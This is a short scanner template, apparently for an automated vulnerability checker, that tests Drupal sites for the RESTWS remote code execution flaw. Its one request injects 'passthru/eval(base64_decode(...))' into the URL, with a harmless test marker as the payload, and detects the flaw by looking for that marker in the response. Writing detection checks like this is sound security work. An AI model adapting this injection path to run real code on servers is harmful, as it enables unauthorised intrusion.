id: cve-drupal-03
info:
  name: Drupal RESTWS RCE
  risk: High

variables:
  - ran: RandomString(8)

requests:
  - method: GET
    redirect: false
    url: >-
      {{.BaseURL}}/?q=taxonomy_vocabulary/{{.ran}}/passthru/eval(base64_decode("MHhkMGZmOV90ZXN0"));
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "0xd0ff9_test")

reference:
  - link: https://www.exploit-db.com/exploits/40130
